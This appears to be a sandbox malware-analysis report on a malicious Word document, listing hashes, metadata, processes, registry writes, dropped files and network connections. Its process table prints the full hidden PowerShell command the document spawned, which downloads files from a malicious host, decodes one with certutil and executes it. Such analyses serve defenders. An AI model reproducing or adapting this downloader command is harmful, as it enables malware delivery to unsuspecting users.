| File name: | lyft-d101919.doc |
| Full analysis: | https://app.any.run/tasks/a9d116cb-2f9b-4c9d-988e-1805eb349323 |
| Verdict: | Malicious activity |
| Analysis date: | February 21, 2020, 23:18:10 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: user, Template: Normal, Last Saved By: Windows User, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Feb 13 14:53:00 2020, Last Saved Time/Date: Thu Feb 13 14:58:00 2020, Number of Pages: 1, Number of Words: 39, Number of Characters: 227, Security: 0 |
| MD5: | 11F5FA32B642E0483D6547D1D5B7523A |
| SHA1: | B8123E1903CD07BD1313D62871B977D72BA18D77 |
| SHA256: | 8D8DC48705E43CA8CF1897F2ED277C46502D6E8E00A7EBAF7F7ED5179AE8DE34 |
| SSDEEP: | 3072:neqI9kejd68AczcNMT+MMoPxbU32qSz6kn5lDl:4dpq/w5l |
MALICIOUS
No malicious indicators.SUSPICIOUS
PowerShell script executed
- powershell.exe (PID: 3452)
Executed via WMI
- powershell.exe (PID: 3452)
Starts CertUtil for decode files
- powershell.exe (PID: 3452)
Creates files in the user directory
- powershell.exe (PID: 3452)
Reads Internet Cache Settings
- WINWORD.EXE (PID: 2544)
INFO
Creates files in the user directory
- WINWORD.EXE (PID: 2544)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2544)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (38.3) |
|---|---|---|
| .xls | | | Microsoft Excel sheet (alternate) (29.3) |
| .doc | | | Microsoft Word document (old ver.) (22.7) |
EXIF
FlashPix
| Title: | - |
|---|---|
| Subject: | - |
| Author: | user |
| Keywords: | - |
| Comments: | - |
| Template: | Normal |
| LastModifiedBy: | Windows User |
| RevisionNumber: | 4 |
| Software: | Microsoft Office Word |
| TotalEditTime: | 1.0 minutes |
| CreateDate: | 2020:02:13 14:53:00 |
| ModifyDate: | 2020:02:13 14:58:00 |
| Pages: | 1 |
| Words: | 39 |
| Characters: | 227 |
| Security: | None |
| CodePage: | Windows Cyrillic |
| Company: | diakov.net |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 265 |
| AppVersion: | 15 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
Total processes
39
Monitored processes
3
Malicious processes
0
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2544 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\lyft-d101919.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3452 | powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://neoneo-bg.site/hIeak.dat,http://neoneo-bg.site/geTask.dat,http://neoneo-bg.site/rTTj.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\rTTj.com\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera po15p; Start-Process vido.com -ArgumentList po15p | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3684 | "C:\Windows\system32\certutil.exe" -decode sfera po15p | C:\Windows\system32\certutil.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 2147942402 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
18 241
Read events
7 802
Write events
10 279
Delete events
160
Modification events
| (PID) Process: | (2544) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | }50 |
Value: 7D353000F0090000010000000000000000000000 | |||
| (PID) Process: | (2544) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2544) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1041 |
Value: Off | |||
| (PID) Process: | (2544) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1046 |
Value: Off | |||
| (PID) Process: | (2544) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1036 |
Value: Off | |||
| (PID) Process: | (2544) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1031 |
Value: Off | |||
| (PID) Process: | (2544) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1040 |
Value: Off | |||
| (PID) Process: | (2544) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1049 |
Value: Off | |||
| (PID) Process: | (2544) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 3082 |
Value: Off | |||
| (PID) Process: | (2544) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1042 |
Value: Off | |||
Executable files
0
Suspicious files
5
Text files
2
Unknown types
3
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR69FD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3452 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RDVWM085I84EMUK3PFEJ.temp | — | |
MD5:— | SHA256:— | |||
| 2544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\config14[1].xml | — | |
MD5:— | SHA256:— | |||
| 2544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CabE71D.tmp | — | |
MD5:— | SHA256:— | |||
| 2544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\TarE71E.tmp | — | |
MD5:— | SHA256:— | |||
| 2544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ft-d101919.doc | pgc | |
MD5:— | SHA256:— | |||
| 2544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\ONetConfig\b6419f5bc3093b5f22142ce454e02407.sig | binary | |
MD5:— | SHA256:— | |||
| 3452 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 2544 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 3452 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFa67680.TMP | binary | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
4
DNS requests
5
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | HEAD | 404 | 92.63.192.216:80 | http://neoneo-bg.site/hIeak.dat | RU | — | — | malicious |
2544 | WINWORD.EXE | GET | 200 | 52.109.76.6:80 | http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023 | IE | xml | 1.99 Kb | whitelisted |
2544 | WINWORD.EXE | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAtqs7A%2Bsan2xGCSaqjN%2FrM%3D | US | der | 1.47 Kb | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2544 | WINWORD.EXE | 52.109.76.6:80 | office14client.microsoft.com | Microsoft Corporation | IE | whitelisted |
— | — | 92.63.192.216:80 | neoneo-bg.site | IT DeLuxe Ltd. | RU | malicious |
2544 | WINWORD.EXE | 52.109.120.28:443 | rr.office.microsoft.com | Microsoft Corporation | HK | whitelisted |
2544 | WINWORD.EXE | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
embaracedo.microsoft.com |
| unknown |
neoneo-bg.site |
| malicious |
office14client.microsoft.com |
| whitelisted |
rr.office.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |